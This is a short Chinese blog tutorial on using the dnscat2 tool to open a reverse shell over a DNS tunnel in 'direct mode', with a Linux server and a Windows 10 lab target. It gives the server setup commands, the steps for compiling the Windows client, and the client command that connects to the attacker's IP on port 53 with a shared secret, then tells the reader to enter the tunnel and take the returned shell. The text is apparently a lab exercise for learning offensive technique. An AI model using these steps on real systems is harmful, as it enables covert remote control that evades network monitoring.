使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

安鸾彭于晏2024-07-18 22:39
  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
如若1231 小时前
AutoDL云服务器 NVIDIA 570驱动 EGL渲染修复全记录
运维·服务器·python
i建模1 小时前
Omarchy设置防火墙
linux·运维
晚秋大魔王1 小时前
泰拉瑞亚手机版服务器部署
运维·服务器·泰拉瑞亚
敲代码的哈吉蜂1 小时前
高可用集群Keepalived
运维·服务器·网络·数据库
S-码农2 小时前
Linux ——条件变量
linux·开发语言
爱写代码的liding2 小时前
linux安装软件过程中报找不到某些动态链接.so文件
linux
青衫码上行2 小时前
【项目部署】Spring Boot项目部署的四种方式
java·linux·服务器·spring boot·后端·docker·腾讯云
盟接之桥2 小时前
盟接之桥说制造:从客供的外在共生到内在的身心合一
运维·服务器·网络·人工智能·制造
火车叼位2 小时前
让 SSL 证书管理更简单:k ssl 命令实战手册
运维
x***r1513 小时前
Zotero7.0.8 文献管理安装步骤详解(附文献管理与同步设置教程)
windows
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南06HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库07全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)08如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解09MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法10jdk21下载、安装(Windows、Linux、macOS)